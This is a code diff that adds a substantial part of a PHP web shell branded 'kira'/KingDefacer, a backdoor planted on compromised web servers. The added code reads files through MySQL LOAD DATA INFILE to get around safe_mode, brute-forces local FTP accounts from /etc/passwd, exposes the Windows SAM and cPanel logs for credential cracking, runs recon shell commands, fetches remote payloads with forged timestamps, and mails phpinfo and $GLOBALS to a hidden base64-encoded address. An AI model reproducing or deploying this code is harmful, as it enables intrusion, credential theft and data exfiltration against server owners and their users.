+    if ($sql_act == "newdb")
+    {
+     echo "<b>";
+     if ((mysql_create_db ($sql_newdb)) and (!empty($sql_newdb))) {echo "DB \"".htmlspecialchars($sql_newdb)."\" has been created with success!</b><br>";}
+     else {echo "Can't create DB \"".htmlspecialchars($sql_newdb)."\".<br>Reason:</b> ".mysql_smarterror();}
+    }
+    if ($sql_act == "serverstatus")
+    {
+     $result = mysql_query("SHOW STATUS", $sql_sock);
+     echo "<center><b>Server-status variables:</b><br><br>";
+     echo "<TABLE cellSpacing=0 cellPadding=0 bgColor=#000000 borderColorLight=#000000 border=1><td><b>Name</b></td><td><b>Value</b></td></tr>";
+     while ($row = mysql_fetch_array($result, MYSQL_NUM)) {echo "<tr><td>".$row[0]."</td><td>".$row[1]."</td></tr>";}
+     echo "</table></center>";
+     mysql_free_result($result);
+    }
+    if ($sql_act == "servervars")
+    {
+     $result = mysql_query("SHOW VARIABLES", $sql_sock);
+     echo "<center><b>Server variables:</b><br><br>";
+     echo "<TABLE cellSpacing=0 cellPadding=0 bgColor=#000000 borderColorLight=#000000 border=1><td><b>Name</b></td><td><b>Value</b></td></tr>";
+     while ($row = mysql_fetch_array($result, MYSQL_NUM)) {echo "<tr><td>".$row[0]."</td><td>".$row[1]."</td></tr>";}
+     echo "</table>";
+     mysql_free_result($result);
+    }
+    if ($sql_act == "processes")
+    {
+     if (!empty($kill)) {$query = "KILL ".$kill.";"; $result = mysql_query($query, $sql_sock); echo "<b>Killing process #".$kill."... ok. he is dead, amen.</b>";}
+     $result = mysql_query("SHOW PROCESSLIST", $sql_sock);
+     echo "<center><b>Processes:</b><br><br>";
+     echo "<TABLE cellSpacing=0 cellPadding=2 bgColor=#000000 borderColorLight=#000000 border=1><td><b>ID</b></td><td><b>USER</b></td><td><b>HOST</b></td><td><b>DB</b></td><td><b>COMMAND</b></td><td><b>TIME</b></td><td><b>STATE</b></td><td><b>INFO</b></td><td><b>Action</b></td></tr>";
+     while ($row = mysql_fetch_array($result, MYSQL_NUM)) { echo "<tr><td>".$row[0]."</td><td>".$row[1]."</td><td>".$row[2]."</td><td>".$row[3]."</td><td>".$row[4]."</td><td>".$row[5]."</td><td>".$row[6]."</td><td>".$row[7]."</td><td><a href=\"".$sql_surl."sql_act=processes&kill=".$row[0]."\"><u>Kill</u></a></td></tr>";}
+     echo "</table>";
+     mysql_free_result($result);
+    }
+    if ($sql_act == "getfile")
+    {
+     $tmpdb = $sql_login."_tmpdb";
+     $select = mysql_select_db($tmpdb);
+     if (!$select) {mysql_create_db($tmpdb); $select = mysql_select_db($tmpdb); $created = !!$select;}
+     if ($select)
+     {
+      $created = FALSE;
+      mysql_query("CREATE TABLE `tmp_file` ( `Viewing the file in safe_mode+open_basedir` LONGBLOB NOT NULL );");
+      mysql_query("LOAD DATA INFILE \"".addslashes($sql_getfile)."\" INTO TABLE tmp_file");
+      $result = mysql_query("SELECT * FROM tmp_file;");
+      if (!$result) {echo "<b>Error in reading file (permision denied)!</b>";}
+      else
+      {
+       for ($i=0;$i<mysql_num_fields($result);$i++) {$name = mysql_field_name($result,$i);}
+       $f = "";
+       while ($row = mysql_fetch_array($result, MYSQL_ASSOC)) {$f .= join ("\r\n",$row);}
+       if (empty($f)) {echo "<b>File \"".$sql_getfile."\" does not exists or empty!</b><br>";}
+       else {echo "<b>File \"".$sql_getfile."\":</b><br>".nl2br(htmlspecialchars($f))."<br>";}
+       mysql_free_result($result);
+       mysql_query("DROP TABLE tmp_file;");
+      }
+     }
+     mysql_drop_db($tmpdb); //comment it if you want to leave database
+    }
+   }
+  }
+ }
+ echo "</td></tr></table>";
+ if ($sql_sock)
+ {
+  $affected = @mysql_affected_rows($sql_sock);
+  if ((!is_numeric($affected)) or ($affected < 0)){$affected = 0;}
+  echo "<tr><td><center><b>Affected rows: ".$affected."</center></td></tr>";
+ }
+ echo "</table>";
+}
+if ($act == "mkdir")
+{
+ if ($mkdir != $d)
+ {
+  if (file_exists($mkdir)) {echo "<b>Make Dir \"".htmlspecialchars($mkdir)."\"</b>: object alredy exists";}
+  elseif (!mkdir($mkdir)) {echo "<b>Make Dir \"".htmlspecialchars($mkdir)."\"</b>: access denied";}
+  echo "<br><br>";
+ }
+ $act = $dspact = "ls";
+}
+if ($act == "ftpquickbrute")
+{
+ echo "<b>Ftp Quick brute:</b><br>";
+ if (!win) {echo "This functions not work in Windows!<br><br>";}
+ else
+ {
+  function KingDefacerftpbrutecheck($host,$port,$timeout,$login,$pass,$sh,$fqb_onlywithsh)
+  {
+   if ($fqb_onlywithsh) {$TRUE = (!in_array($sh,array("/bin/FALSE","/sbin/nologin")));}
+   else {$TRUE = TRUE;}
+   if ($TRUE)
+   {
+    $sock = @ftp_connect($host,$port,$timeout);
+    if (@ftp_login($sock,$login,$pass))
+    {
+     echo "<a href=\"ftp://".$login.":".$pass."@".$host."\" target=\"_blank\"><b>Connected to ".$host." with login \"".$login."\" and password \"".$pass."\"</b></a>.<br>";
+     ob_flush();
+     return TRUE;
+    }
+   }
+  }
+  if (!empty($submit))
+  {
+   if (!is_numeric($fqb_lenght)) {$fqb_lenght = $nixpwdperpage;}
+   $fp = fopen("/etc/passwd","r");
+   if (!$fp) {echo "Can't get /etc/passwd for password-list.";}
+   else
+   {
+    if ($fqb_logging)
+    {
+     if ($fqb_logfile) {$fqb_logfp = fopen($fqb_logfile,"w");}
+     else {$fqb_logfp = FALSE;}
+     $fqb_log = "FTP Quick Brute (called kira v. ".$shver.") started at ".date("d.m.Y H:i:s")."\r\n\r\n";
+     if ($fqb_logfile) {fwrite($fqb_logfp,$fqb_log,strlen($fqb_log));}
+    }
+    ob_flush();
+    $i = $success = 0;
+    $ftpquick_st = getmicrotime();
+    while(!feof($fp))
+    {
+     $str = explode(":",fgets($fp,2048));
+     if (KingDefacerftpbrutecheck("localhost",21,1,$str[0],$str[0],$str[6],$fqb_onlywithsh))
+     {
+      echo "<b>Connected to ".getenv("SERVER_NAME")." with login \"".$str[0]."\" and password \"".$str[0]."\"</b><br>";
+      $fqb_log .= "Connected to ".getenv("SERVER_NAME")." with login \"".$str[0]."\" and password \"".$str[0]."\", at ".date("d.m.Y H:i:s")."\r\n";
+      if ($fqb_logfp) {fseek($fqb_logfp,0); fwrite($fqb_logfp,$fqb_log,strlen($fqb_log));}
+      $success++;
+      ob_flush();
+     }
+     if ($i > $fqb_lenght) {break;}
+     $i++;
+    }
+    if ($success == 0) {echo "No success. connections!"; $fqb_log .= "No success. connections!\r\n";}
+    $ftpquick_t = round(getmicrotime()-$ftpquick_st,4);
+    echo "<hr size=\"1\" noshade><b>Done!</b><br>Total time (secs.): ".$ftpquick_t."<br>Total connections: ".$i."<br>Success.: <font color=green><b>".$success."</b></font><br>Unsuccess.:".($i-$success)."</b><br>Connects per second: ".round($i/$ftpquick_t,2)."<br>";
+    $fqb_log .= "\r\n------------------------------------------\r\nDone!\r\nTotal time (secs.): ".$ftpquick_t."\r\nTotal connections: ".$i."\r\nSuccess.: ".$success."\r\nUnsuccess.:".($i-$success)."\r\nConnects per second: ".round($i/$ftpquick_t,2)."\r\n";
+    if ($fqb_logfp) {fseek($fqb_logfp,0); fwrite($fqb_logfp,$fqb_log,strlen($fqb_log));}
+    if ($fqb_logemail) {@mail($fqb_logemail,"kira v. ".$shver." report",$fqb_log);}
+    fclose($fqb_logfp);
+   }
+  }
+  else
+  {
+   $logfile = $tmpdir_logs."KingDefacer_ftpquickbrute_".date("d.m.Y_H_i_s").".log";
+   $logfile = str_replace("//",DIRECTORY_SEPARATOR,$logfile);
+   echo "<form action=\"".$surl."\"><input type=hidden name=act value=\"ftpquickbrute\"><br>Read first: <input type=text name=\"fqb_lenght\" value=\"".$nixpwdperpage."\"><br><br>Users only with shell?&nbsp;<input type=\"checkbox\" name=\"fqb_onlywithsh\" value=\"1\"><br><br>Logging?&nbsp;<input type=\"checkbox\" name=\"fqb_logging\" value=\"1\" checked><br>Logging to file?&nbsp;<input type=\"text\" name=\"fqb_logfile\" value=\"".$logfile."\" size=\"".(strlen($logfile)+2*(strlen($logfile)/10))."\"><br>Logging to e-mail?&nbsp;<input type=\"text\" name=\"fqb_logemail\" value=\"".$log_email."\" size=\"".(strlen($logemail)+2*(strlen($logemail)/10))."\"><br><br><input type=submit name=submit value=\"Brute\"></form>";
+  }
+ }
+}
+if ($act == "d")
+{
+ if (!is_dir($d)) {echo "<center><b>Permision denied!</b></center>";}
+ else
+ {
+  echo "<b>Directory information:</b><table border=0 cellspacing=1 cellpadding=2>";
+  if (!$win)
+  {
+   echo "<tr><td><b>Owner/Group</b></td><td> ";
+   $ow = posix_getpwuid(fileowner($d));
+   $gr = posix_getgrgid(filegroup($d));
+   $row[] = ($ow["name"]?$ow["name"]:fileowner($d))."/".($gr["name"]?$gr["name"]:filegroup($d));
+  }
+  echo "<tr><td><b>Perms</b></td><td><a href=\"".$surl."act=chmod&d=".urlencode($d)."\"><b>".view_perms_color($d)."</b></a><tr><td><b>Create time</b></td><td> ".date("d/m/Y H:i:s",filectime($d))."</td></tr><tr><td><b>Access time</b></td><td> ".date("d/m/Y H:i:s",fileatime($d))."</td></tr><tr><td><b>MODIFY time</b></td><td> ".date("d/m/Y H:i:s",filemtime($d))."</td></tr></table><br>";
+ }
+}
+if ($act == "phpinfo") {@ob_clean(); phpinfo(); KingDefacerexit();}
+if ($act == "security")
+{
+ echo "<center><b>Server security information:</b></center><b>Open base dir: ".$hopenbasedir."</b><br>";
+ if (!$win)
+ {
+  if ($nixpasswd)
+  {
+   if ($nixpasswd == 1) {$nixpasswd = 0;}
+   echo "<b>*nix /etc/passwd:</b><br>";
+   if (!is_numeric($nixpwd_s)) {$nixpwd_s = 0;}
+   if (!is_numeric($nixpwd_e)) {$nixpwd_e = $nixpwdperpage;}
+   echo "<form action=\"".$surl."\"><input type=hidden name=act value=\"security\"><input type=hidden name=\"nixpasswd\" value=\"1\"><b>From:</b>&nbsp;<input type=\"text=\" name=\"nixpwd_s\" value=\"".$nixpwd_s."\">&nbsp;<b>To:</b>&nbsp;<input type=\"text\" name=\"nixpwd_e\" value=\"".$nixpwd_e."\">&nbsp;<input type=submit value=\"View\"></form><br>";
+   $i = $nixpwd_s;
+   while ($i < $nixpwd_e)
+   {
+    $uid = posix_getpwuid($i);
+    if ($uid)
+    {
+     $uid["dir"] = "<a href=\"".$surl."act=ls&d=".urlencode($uid["dir"])."\">".$uid["dir"]."</a>";
+     echo join(":",$uid)."<br>";
+    }
+    $i++;
+   }
+  }
+  else {echo "<br><a href=\"".$surl."act=security&nixpasswd=1&d=".$ud."\"><b><u>Get /etc/passwd</u></b></a><br>";}
+ }
+ else
+ {
+  $v = $_SERVER["WINDIR"]."\repair\sam";
+  if (file_get_contents($v)) {echo "<b><font color=red>You can't crack winnt passwords(".$v.") </font></b><br>";}
+  else {echo "<b><font color=green>You can crack winnt passwords. <a href=\"".$surl."act=f&f=sam&d=".$_SERVER["WINDIR"]."\\repair&ft=download\"><u><b>Download</b></u></a>, and use lcp.crack+ ©.</font></b><br>";}
+ }
+ if (file_get_contents("/etc/userdomains")) {echo "<b><font color=green><a href=\"".$surl."act=f&f=userdomains&d=".urlencode("/etc")."&ft=txt\"><u><b>View cpanel user-domains logs</b></u></a></font></b><br>";}
+ if (file_get_contents("/var/cpanel/accounting.log")) {echo "<b><font color=green><a href=\"".$surl."act=f&f=accounting.log&d=".urlencode("/var/cpanel/")."\"&ft=txt><u><b>View cpanel logs</b></u></a></font></b><br>";}
+ if (file_get_contents("/usr/local/apache/conf/httpd.conf")) {echo "<b><font color=green><a href=\"".$surl."act=f&f=httpd.conf&d=".urlencode("/usr/local/apache/conf")."&ft=txt\"><u><b>Apache configuration (httpd.conf)</b></u></a></font></b><br>";}
+ if (file_get_contents("/etc/httpd.conf")) {echo "<b><font color=green><a href=\"".$surl."act=f&f=httpd.conf&d=".urlencode("/etc")."&ft=txt\"><u><b>Apache configuration (httpd.conf)</b></u></a></font></b><br>";}
+ if (file_get_contents("/etc/syslog.conf")) {echo "<b><font color=green><a href=\"".$surl."act=f&f=syslog.conf&d=".urlencode("/etc")."&ft=txt\"><u><b>Syslog configuration (syslog.conf)</b></u></a></font></b><br>";}
+ if (file_get_contents("/etc/motd")) {echo "<b><font color=green><a href=\"".$surl."act=f&f=motd&d=".urlencode("/etc")."&ft=txt\"><u><b>Message Of The Day</b></u></a></font></b><br>";}
+ if (file_get_contents("/etc/hosts")) {echo "<b><font color=green><a href=\"".$surl."act=f&f=hosts&d=".urlencode("/etc")."&ft=txt\"><u><b>Hosts</b></u></a></font></b><br>";}
+ function displaysecinfo($name,$value) {if (!empty($value)) {if (!empty($name)) {$name = "<b>".$name." - </b>";} echo $name.nl2br($value)."<br>";}}
+ displaysecinfo("OS Version?",myshellexec("cat /proc/version"));
+ displaysecinfo("Kernel version?",myshellexec("sysctl -a | grep version"));
+ displaysecinfo("Distrib name",myshellexec("cat /etc/issue.net"));
+ displaysecinfo("Distrib name (2)",myshellexec("cat /etc/*-realise"));
+ displaysecinfo("CPU?",myshellexec("cat /proc/cpuinfo"));
+ displaysecinfo("RAM",myshellexec("free -m"));
+ displaysecinfo("HDD space",myshellexec("df -h"));
+ displaysecinfo("List of Attributes",myshellexec("lsattr -a"));
+ displaysecinfo("Mount options ",myshellexec("cat /etc/fstab"));
+ displaysecinfo("Is cURL installed?",myshellexec("which curl"));
+ displaysecinfo("Is lynx installed?",myshellexec("which lynx"));
+ displaysecinfo("Is links installed?",myshellexec("which links"));
+ displaysecinfo("Is fetch installed?",myshellexec("which fetch"));
+ displaysecinfo("Is GET installed?",myshellexec("which GET"));
+ displaysecinfo("Is perl installed?",myshellexec("which perl"));
+ displaysecinfo("Where is apache",myshellexec("whereis apache"));
+ displaysecinfo("Where is perl?",myshellexec("whereis perl"));
+ displaysecinfo("locate proftpd.conf",myshellexec("locate proftpd.conf"));
+ displaysecinfo("locate httpd.conf",myshellexec("locate httpd.conf"));
+ displaysecinfo("locate my.conf",myshellexec("locate my.conf"));
+ displaysecinfo("locate psybnc.conf",myshellexec("locate psybnc.conf"));
+}
+if ($act == "mkfile")
+{
+ if ($mkfile != $d)
+ {
+  if (file_exists($mkfile)) {echo "<b>Make File \"".htmlspecialchars($mkfile)."\"</b>: object alredy exists";}
+  elseif (!fopen($mkfile,"w")) {echo "<b>Make File \"".htmlspecialchars($mkfile)."\"</b>: access denied";}
+  else {$act = "f"; $d = dirname($mkfile); if (substr($d,-1) != DIRECTORY_SEPARATOR) {$d .= DIRECTORY_SEPARATOR;} $f = basename($mkfile);}
+ }
+ else {$act = $dspact = "ls";}
+}
+if ($act == "encoder")
+{
+ echo "<script>function set_encoder_input(text) {document.forms.encoder.input.value = text;}</script><center><b>Encoder:</b></center><form name=\"encoder\" action=\"".$surl."\" method=POST><input type=hidden name=act value=encoder><b>Input:</b><center><textarea name=\"encoder_input\" id=\"input\" cols=50 rows=5>".@htmlspecialchars($encoder_input)."</textarea><br><br><input type=submit value=\"calculate\"><br><br></center><b>Hashes</b>:<br><center>";
+ foreach(array("md5","crypt","sha1","crc32") as $v)
+ {
+  echo $v." - <input type=text size=50 onFocus=\"this.select()\" onMouseover=\"this.select()\" onMouseout=\"this.select()\" value=\"".$v($encoder_input)."\" readonly><br>";
+ }
+ echo "</center><b>Url:</b><center><br>urlencode - <input type=text size=35 onFocus=\"this.select()\" onMouseover=\"this.select()\" onMouseout=\"this.select()\" value=\"".urlencode($encoder_input)."\" readonly>
+ <br>urldecode - <input type=text size=35 onFocus=\"this.select()\" onMouseover=\"this.select()\" onMouseout=\"this.select()\" value=\"".htmlspecialchars(urldecode($encoder_input))."\" readonly>
+ <br></center><b>Base64:</b><center>base64_encode - <input type=text size=35 onFocus=\"this.select()\" onMouseover=\"this.select()\" onMouseout=\"this.select()\" value=\"".base64_encode($encoder_input)."\" readonly></center>";
+ echo "<center>base64_decode - ";
+ if (base64_encode(base64_decode($encoder_input)) != $encoder_input) {echo "<input type=text size=35 value=\"failed\" disabled readonly>";}
+ else
+ {
+  $debase64 = base64_decode($encoder_input);
+  $debase64 = str_replace("\0","[0]",$debase64);
+  $a = explode("\r\n",$debase64);
+  $rows = count($a);
+  $debase64 = htmlspecialchars($debase64);
+  if ($rows == 1) {echo "<input type=text size=35 onFocus=\"this.select()\" onMouseover=\"this.select()\" onMouseout=\"this.select()\" value=\"".$debase64."\" id=\"debase64\" readonly>";}
+  else {$rows++; echo "<textarea cols=\"40\" rows=\"".$rows."\" onFocus=\"this.select()\" onMouseover=\"this.select()\" onMouseout=\"this.select()\" id=\"debase64\" readonly>".$debase64."</textarea>";}
+  echo "&nbsp;<a href=\"#\" onclick=\"set_encoder_input(document.forms.encoder.debase64.value)\"><b>^</b></a>";
+ }
+ echo "</center><br><b>Base convertations</b>:<center>dec2hex - <input type=text size=35 onFocus=\"this.select()\" onMouseover=\"this.select()\" onMouseout=\"this.select()\" value=\"";
+ $c = strlen($encoder_input);
+ for($i=0;$i<$c;$i++)
+ {
+  $hex = dechex(ord($encoder_input[$i]));
+  if ($encoder_input[$i] == "&") {echo $encoder_input[$i];}
+  elseif ($encoder_input[$i] != "\\") {echo "%".$hex;}
+ }
+ echo "\" readonly><br></center></form>";
+}
+if ($act == "fsbuff")
+{
+ $arr_copy = $sess_data["copy"];
+ $arr_cut = $sess_data["cut"];
+ $arr = array_merge($arr_copy,$arr_cut);
+ if (count($arr) == 0) {echo "<center><b>Buffer is empty!</b></center>";}
+ else {echo "<b>File-System buffer</b><br><br>"; $ls_arr = $arr; $disp_fullpath = TRUE; $act = "ls";}
+}
+if ($act == "selfremove")
+{
+ if (($submit == $rndcode) and ($submit != ""))
+ {
+  if (unlink(__FILE__)) {@ob_clean(); echo "Thanks for using kira v.".$shver."!"; KingDefacerexit(); }
+  else {echo "<center><b>Can't delete ".__FILE__."!</b></center>";}
+ }
+ else
+ {
+  if (!empty($rndcode)) {echo "<b>Error: incorrect confimation!</b>";}
+  $rnd = rand(0,9).rand(0,9).rand(0,9);
+  echo "<form action=\"".$surl."\"><input type=hidden name=act value=selfremove><b>Self-remove: ".__FILE__." <br><b>Are you sure?<br>For confirmation, enter \"".$rnd."\"</b>:&nbsp;<input type=hidden name=rndcode value=\"".$rnd."\"><input type=text name=submit>&nbsp;<input type=submit value=\"YES\"></form>";
+ }
+}
+if ($act == "update") {$ret = KingDefacer_getupdate(!!$confirmupdate); echo "<b>".$ret."</b>"; if (stristr($ret,"new version")) {echo "<br><br><input type=button onclick=\"location.href='".$surl."act=update&confirmupdate=1';\" value=\"Update now\">";}}
+if ($act == "feedback")
+{
+ $suppmail = base64_decode("ZnJl Here was Fucked log code Q==");
+ if (!empty($submit))
+ {
+  $ticket = substr(md5(microtime()+rand(1,1000)),0,6);
+  $body = "kira v.".$shver." feedback #".$ticket."\nName: ".htmlspecialchars($fdbk_name)."\nE-mail: ".htmlspecialchars($fdbk_email)."\nMessage:\n".htmlspecialchars($fdbk_body)."\n\nIP: ".$REMOTE_ADDR;
+  if (!empty($fdbk_ref))
+  {
+   $tmp = @ob_get_contents();
+   ob_clean();
+   phpinfo();
+   $phpinfo = base64_encode(ob_get_contents());
+   ob_clean();
+   echo $tmp;
+   $body .= "\n"."phpinfo(): ".$phpinfo."\n"."\$GLOBALS=".base64_encode(serialize($GLOBALS))."\n";
+  }
+  mail($suppmail,"kira v.".$shver." feedback #".$ticket,$body,"FROM: ".$suppmail);
+  echo "<center><b>Thanks for your feedback! Your ticket ID: ".$ticket.".</b></center>";
+ }
+ else {echo "<form action=\"".$surl."\" method=POST><input type=hidden name=act value=feedback><b>Feedback or report bug (".str_replace(array("@","."),array("[at]","[dot]"),$suppmail)."):<br><br>Your name: <input type=\"text\" name=\"fdbk_name\" value=\"".htmlspecialchars($fdbk_name)."\"><br><br>Your e-mail: <input type=\"text\" name=\"fdbk_email\" value=\"".htmlspecialchars($fdbk_email)."\"><br><br>Message:<br><textarea name=\"fdbk_body\" cols=80 rows=10>".htmlspecialchars($fdbk_body)."</textarea><input type=\"hidden\" name=\"fdbk_ref\" value=\"".urlencode($HTTP_REFERER)."\"><br><br>Attach server-info * <input type=\"checkbox\" name=\"fdbk_servinf\" value=\"1\" checked><br><br>There are no checking in the form.<br><br>* - strongly recommended, if you report bug, because we need it for bug-fix.<br><br>We understand languages: English, Russian.<br><br><input type=\"submit\" name=\"submit\" value=\"Send\"></form>";}
+}
+if ($act == "search")
+{
+ echo "<b>Search in file-system:</b><br>";
+ if (empty($search_in)) {$search_in = $d;}
+ if (empty($search_name)) {$search_name = "(.*)"; $search_name_regexp = 1;}
+ if (empty($search_text_wwo)) {$search_text_regexp = 0;}
+ if (!empty($submit))
+ {
+  $found = array();
+  $found_d = 0;
+  $found_f = 0;
+  $search_i_f = 0;
+  $search_i_d = 0;
+  $a = array
+  (
+   "name"=>$search_name, "name_regexp"=>$search_name_regexp,
+   "text"=>$search_text, "text_regexp"=>$search_text_regxp,
+   "text_wwo"=>$search_text_wwo,
+   "text_cs"=>$search_text_cs,
+   "text_not"=>$search_text_not
+  );
+  $searchtime = getmicrotime();
+  $in = array_unique(explode(";",$search_in));
+  foreach($in as $v) {KingDefacerfsearch($v);}
+  $searchtime = round(getmicrotime()-$searchtime,4);
+  if (count($found) == 0) {echo "<b>No files found!</b>";}
+  else
+  {
+   $ls_arr = $found;
+   $disp_fullpath = TRUE;
+   $act = "ls";
+  }
+ }
+ echo "<form method=POST>
+<input type=hidden name=\"d\" value=\"".$dispd."\"><input type=hidden name=act value=\"".$dspact."\">
+<b>Search for (file/folder name): </b><input type=\"text\" name=\"search_name\" size=\"".round(strlen($search_name)+25)."\" value=\"".htmlspecialchars($search_name)."\">&nbsp;<input type=\"checkbox\" name=\"search_name_regexp\" value=\"1\" ".($search_name_regexp == 1?" checked":"")."> - regexp
+<br><b>Search in (explode \";\"): </b><input type=\"text\" name=\"search_in\" size=\"".round(strlen($search_in)+25)."\" value=\"".htmlspecialchars($search_in)."\">
+<br><br><b>Text:</b><br><textarea name=\"search_text\" cols=\"122\" rows=\"10\">".htmlspecialchars($search_text)."</textarea>
+<br><br><input type=\"checkbox\" name=\"search_text_regexp\" value=\"1\" ".($search_text_regexp == 1?" checked":"")."> - regexp
+&nbsp;&nbsp;<input type=\"checkbox\" name=\"search_text_wwo\" value=\"1\" ".($search_text_wwo == 1?" checked":"")."> - <u>w</u>hole words only
+&nbsp;&nbsp;<input type=\"checkbox\" name=\"search_text_cs\" value=\"1\" ".($search_text_cs == 1?" checked":"")."> - cas<u>e</u> sensitive
+&nbsp;&nbsp;<input type=\"checkbox\" name=\"search_text_not\" value=\"1\" ".($search_text_not == 1?" checked":"")."> - find files <u>NOT</u> containing the text
+<br><br><input type=submit name=submit value=\"Search\"></form>";
+ if ($act == "ls") {$dspact = $act; echo "<hr size=\"1\" noshade><b>Search took ".$searchtime." secs (".$search_i_f." files and ".$search_i_d." folders, ".round(($search_i_f+$search_i_d)/$searchtime,4)." objects per second).</b><br><br>";}
+}
+if ($act == "chmod")
+{
+ $mode = fileperms($d.$f);
+ if (!$mode) {echo "<b>Change file-mode with error:</b> can't get current value.";}
+ else
+ {
+  $form = TRUE;
+  if ($chmod_submit)
+  {
+   $octet = "0".base_convert(($chmod_o["r"]?1:0).($chmod_o["w"]?1:0).($chmod_o["x"]?1:0).($chmod_g["r"]?1:0).($chmod_g["w"]?1:0).($chmod_g["x"]?1:0).($chmod_w["r"]?1:0).($chmod_w["w"]?1:0).($chmod_w["x"]?1:0),2,8);
+   if (chmod($d.$f,$octet)) {$act = "ls"; $form = FALSE; $err = "";}
+   else {$err = "Can't chmod to ".$octet.".";}
+  }
+  if ($form)
+  {
+   $perms = parse_perms($mode);
+   echo "<b>Changing file-mode (".$d.$f."), ".view_perms_color($d.$f)." (".substr(decoct(fileperms($d.$f)),-4,4).")</b><br>".($err?"<b>Error:</b> ".$err:"")."<form action=\"".$surl."\" method=POST><input type=hidden name=d value=\"".htmlspecialchars($d)."\"><input type=hidden name=f value=\"".htmlspecialchars($f)."\"><input type=hidden name=act value=chmod><table align=left width=300 border=0 cellspacing=0 cellpadding=5><tr><td><b>Owner</b><br><br><input type=checkbox NAME=chmod_o[r] value=1".($perms["o"]["r"]?" checked":"").">&nbsp;Read<br><input type=checkbox name=chmod_o[w] value=1".($perms["o"]["w"]?" checked":"").">&nbsp;Write<br><input type=checkbox NAME=chmod_o[x] value=1".($perms["o"]["x"]?" checked":"").">eXecute</td><td><b>Group</b><br><br><input type=checkbox NAME=chmod_g[r] value=1".($perms["g"]["r"]?" checked":"").">&nbsp;Read<br><input type=checkbox NAME=chmod_g[w] value=1".($perms["g"]["w"]?" checked":"").">&nbsp;Write<br><input type=checkbox NAME=chmod_g[x] value=1".($perms["g"]["x"]?" checked":"").">eXecute</font></td><td><b>World</b><br><br><input type=checkbox NAME=chmod_w[r] value=1".($perms["w"]["r"]?" checked":"").">&nbsp;Read<br><input type=checkbox NAME=chmod_w[w] value=1".($perms["w"]["w"]?" checked":"").">&nbsp;Write<br><input type=checkbox NAME=chmod_w[x] value=1".($perms["w"]["x"]?" checked":"").">eXecute</font></td></tr><tr><td><input type=submit name=chmod_submit value=\"Save\"></td></tr></table></form>";
+  }
+ }
+}
+if ($act == "upload")
+{
+ $uploadmess = "";
+ $uploadpath = str_replace("\\",DIRECTORY_SEPARATOR,$uploadpath);
+ if (empty($uploadpath)) {$uploadpath = $d;}
+ elseif (substr($uploadpath,-1) != "/") {$uploadpath .= "/";}
+ if (!empty($submit))
+ {
+  global $HTTP_POST_FILES;
+  $uploadfile = $HTTP_POST_FILES["uploadfile"];
+  if (!empty($uploadfile["tmp_name"]))
+  {
+   if (empty($uploadfilename)) {$destin = $uploadfile["name"];}
+   else {$destin = $userfilename;}
+   if (!move_uploaded_file($uploadfile["tmp_name"],$uploadpath.$destin)) {$uploadmess .= "Error uploading file ".$uploadfile["name"]." (can't copy \"".$uploadfile["tmp_name"]."\" to \"".$uploadpath.$destin."\"!<br>";}
+  }
+  elseif (!empty($uploadurl))
+  {
+   if (!empty($uploadfilename)) {$destin = $uploadfilename;}
+   else
+   {
+    $destin = explode("/",$destin);
+    $destin = $destin[count($destin)-1];
+    if (empty($destin))
+    {
+     $i = 0;
+     $b = "";
+     while(file_exists($uploadpath.$destin)) {if ($i > 0) {$b = "_".$i;} $destin = "index".$b.".html"; $i++;}}
+   }
+   if ((!eregi("http://",$uploadurl)) and (!eregi("https://",$uploadurl)) and (!eregi("ftp://",$uploadurl))) {echo "<b>Incorect url!</b><br>";}
+   else
+   {
+    $st = getmicrotime();
+    $content = @file_get_contents($uploadurl);
+    $dt = round(getmicrotime()-$st,4);
+    if (!$content) {$uploadmess .=  "Can't download file!<br>";}
+    else
+	 
+    {
+     if ($filestealth) {$stat = stat($uploadpath.$destin);}
+     $fp = fopen($uploadpath.$destin,"w");
+     if (!$fp) {$uploadmess .= "Error writing to file ".htmlspecialchars($destin)."!<br>";}
+     else
+     {
+      fwrite($fp,$content,strlen($content));
+      fclose($fp);
+      if ($filestealth) {touch($uploadpath.$destin,$stat[9],$stat[8]);}
+     }
+    }
+   }
+  }
+ }
+ if ($miniform)
+ {
+  echo "<b>".$uploadmess."</b>";
+  $act = "ls";
+ }
+ else
+ {
+  echo "<b>File upload:</b><br><b>".$uploadmess."</b><form enctype=\"multipart/form-data\" action=\"".$surl."act=upload&d=".urlencode($d)."\" method=POST>
+Select file on your local computer: <input name=\"uploadfile\" type=\"file\"><br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;or<br>
+Input URL: <input name=\"uploadurl\" type=\"text\" value=\"".htmlspecialchars($uploadurl)."\" size=\"70\"><br><br>
+Save this file dir: <input name=\"uploadpath\" size=\"70\" value=\"".$dispd."\"><br><br>
+File-name (auto-fill): <input name=uploadfilename size=25><br><br>
+<input type=checkbox name=uploadautoname value=1 id=df4>&nbsp;convert file name to lovercase<br><br>
+<input type=submit name=submit value=\"Upload\">
+</form>";
+ }
+}
+if ($act == "delete")
+{
+ $delerr = "";
+ foreach ($actbox as $v)
+ {
+  $result = FALSE;
+  $result = fs_rmobj($v);
+  if (!$result) {$delerr .= "Can't delete ".htmlspecialchars($v)."<br>";}
+ }
+ if (!empty($delerr)) {echo "<b>Deleting with errors:</b><br>".$delerr;}
+ $act = "ls";
+}
+if (!$usefsbuff)
+{
+ if (($act == "paste") or ($act == "copy") or ($act == "cut") or ($act == "unselect")) {echo "<center><b>Sorry, buffer is disabled. For enable, set directive \"\$useFSbuff\" as TRUE.</center>";}
+}
+else
+{
+ if ($act == "copy") {$err = ""; $sess_data["copy"] = array_merge($sess_data["copy"],$actbox); KingDefacer_sess_put($sess_data); $act = "ls"; }
+ elseif ($act == "cut") {$sess_data["cut"] = array_merge($sess_data["cut"],$actbox); KingDefacer_sess_put($sess_data); $act = "ls";}
+ elseif ($act == "unselect") {foreach ($sess_data["copy"] as $k=>$v) {if (in_array($v,$actbox)) {unset($sess_data["copy"][$k]);}} foreach ($sess_data["cut"] as $k=>$v) {if (in_array($v,$actbox)) {unset($sess_data["cut"][$k]);}} KingDefacer_sess_put($sess_data); $act = "ls";}
+ if ($actemptybuff) {$sess_data["copy"] = $sess_data["cut"] = array(); KingDefacer_sess_put($sess_data);}
+ elseif ($actpastebuff)
+ {
+  $psterr = "";
+  foreach($sess_data["copy"] as $k=>$v)
+  {
+   $to = $d.basename($v);
+   if (!fs_copy_obj($v,$to)) {$psterr .= "Can't copy ".$v." to ".$to."!<br>";}
+   if ($copy_unset) {unset($sess_data["copy"][$k]);}
+  }
